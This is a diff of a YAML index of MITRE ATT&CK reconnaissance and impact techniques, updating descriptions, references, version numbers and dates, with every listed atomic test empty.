         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -56063,6 +56738,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56073,7 +56749,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -56083,6 +56759,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56095,6 +56775,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56117,6 +56801,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56124,9 +56812,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56185,7 +56872,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56205,7 +56892,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56227,7 +56913,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56243,12 +56929,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56317,7 +57001,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56365,31 +57049,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56398,19 +57063,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -56468,7 +57155,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -56489,7 +57175,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56505,8 +57191,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -56532,7 +57216,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
         Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56548,8 +57232,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.001:
     technique:
@@ -56573,7 +57255,7 @@ reconnaissance:
         url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
         description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
           Pad For Phishing Attacks. Retrieved October 20, 2020.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:43:12.843Z'
       name: Spearphishing Service
       description: |-
         Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56595,13 +57277,11 @@ reconnaissance:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 impact:
   T1561.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:32:05.064Z'
       name: Disk Structure Wipe
       description: "Adversaries may corrupt or wipe the disk data structures on a
         hard drive necessary to boot a system; targeting specific critical systems
@@ -56693,13 +57373,12 @@ impact:
         url: https://www.symantec.com/connect/blogs/shamoon-attacks
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1498.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:54:49.943Z'
       name: Direct Network Flood
       description: |-
         Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56708,7 +57387,6 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_deprecated: false
       x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
         the traffic volume is sufficient to cause impact to the availability of the
@@ -56725,17 +57403,12 @@ impact:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
@@ -56760,7 +57433,8 @@ impact:
         url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1491.002:
     technique:
@@ -56798,7 +57472,7 @@ impact:
         description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
           Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
           How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-25T19:34:37.539Z'
       name: External Defacement
       description: 'An adversary may deface systems external to an organization in
         an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -56832,12 +57506,10 @@ impact:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_impact_type:
       - Integrity
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1499.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:51.289Z'
       name: OS Exhaustion Flood
       description: |-
         Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -56902,42 +57574,127 @@ impact:
         url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
-  T1499.003:
+  T1485.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Linux
-      - macOS
-      - Google Workspace
+      modified: '2024-10-16T21:27:02.481Z'
+      name: Lifecycle-Triggered Deletion
+      description: "Adversaries may modify the lifecycle policies of a cloud storage
+        bucket to destroy all objects stored within.  \n\nCloud storage buckets often
+        allow users to set lifecycle policies to automate the migration, archival,
+        or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+        GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+        has sufficient permissions to modify these policies, they may be able to delete
+        all objects at once. \n\nFor example, in AWS environments, an adversary with
+        the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+        API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+        in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+        to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+        adversaries may also perform this action on buckets storing cloud logs for
+        [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+        Datadog S3 Lifecycle CloudTrail Logs)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Storage: Cloud Storage Modification'
+      x_mitre_impact_type:
+      - Availability
+      type: attack-pattern
+      id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+      created: '2024-09-25T13:16:14.166Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1485/001
+        external_id: T1485.001
+      - source_name: AWS Storage Lifecycles
+        description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+          25, 2024.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+      - source_name: GCP Storage Lifecycles
+        description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+          September 25, 2024.
+        url: https://cloud.google.com/storage/docs/lifecycle
+      - source_name: Azure Storage Lifecycles
+        description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+          policy. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+      - source_name: Palo Alto Cloud Ransomware
+        description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+          in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+          2024.'
+        url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+      - source_name: Datadog S3 Lifecycle CloudTrail Logs
+        description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+          S3 Lifecycle Rule. Retrieved September 25, 2024.
+        url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1496.003:
+    technique:
+      modified: '2024-10-16T17:45:14.210Z'
+      name: SMS Pumping
+      description: |-
+        Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+        Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      x_mitre_impact_type:
+      - Availability
       type: attack-pattern
-      created: '2020-02-20T15:35:00.025Z'
+      id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+      created: '2024-09-25T13:53:19.586Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1499.003
-        url: https://attack.mitre.org/techniques/T1499/003
-      - source_name: Arbor AnnualDoSreport Jan 2018
-        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
-        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
-          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
-          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
-          Infrastructure Security Report. Retrieved April 22, 2019.
-      - source_name: Cisco DoSdetectNetflow
-        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
-        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
-          Retrieved April 25, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1496/003
+        external_id: T1496.003
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Twilio SMS Pumping
+        description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+          Stop It. Retrieved September 25, 2024.
+        url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+      - source_name: Twilio SMS Pumping Fraud
+        description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+          25, 2024.
+        url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1499.003:
+    technique:
+      modified: '2024-10-15T15:41:49.168Z'
       name: Application Exhaustion Flood
       description: 'Adversaries may target resource intensive features of applications
         to cause a denial of service (DoS), denying availability to those applications.
@@ -56948,13 +57705,20 @@ impact:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
 
         In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -56962,12 +57726,33 @@ impact:
       - 'Application Log: Application Log Content'
       x_mitre_impact_type:
       - Availability
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+      created: '2020-02-20T15:35:00.025Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1499/003
+        external_id: T1499.003
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: Arbor AnnualDoSreport Jan 2018
+        description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+          Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+          into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+          Infrastructure Security Report. Retrieved April 22, 2019.
+        url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1561:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-20T18:16:41.942Z'
       name: Disk Wipe
       description: |-
         Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57028,109 +57813,79 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1565.001:
     technique:
+      modified: '2024-08-26T16:33:33.982Z'
+      name: Stored Data Manipulation
+      description: |-
+        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: impact
+      x_mitre_deprecated: false
+      x_mitre_detection: Where applicable, inspect important file hashes, locations,
+        and modifications for suspicious/unexpected values.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      - 'File: File Creation'
+      - 'File: File Deletion'
+      x_mitre_impact_type:
+      - Integrity
       type: attack-pattern
       id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
       created: '2020-03-02T14:22:24.410Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1565.001
         url: https://attack.mitre.org/techniques/T1565/001
+        external_id: T1565.001
       - source_name: DOJ Lazarus Sony 2018
-        url: https://www.justice.gov/opa/press-release/file/1092091/download
         description: Department of Justice. (2018, September 6). Criminal Complaint
           - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+        url: https://www.justice.gov/opa/press-release/file/1092091/download
       - source_name: FireEye APT38 Oct 2018
-        url: https://content.fireeye.com/apt/rpt-apt38
         description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
           November 6, 2018.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
-        Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Stored Data Manipulation
-      x_mitre_detection: Where applicable, inspect important file hashes, locations,
-        and modifications for suspicious/unexpected values.
-      kill_chain_phases:
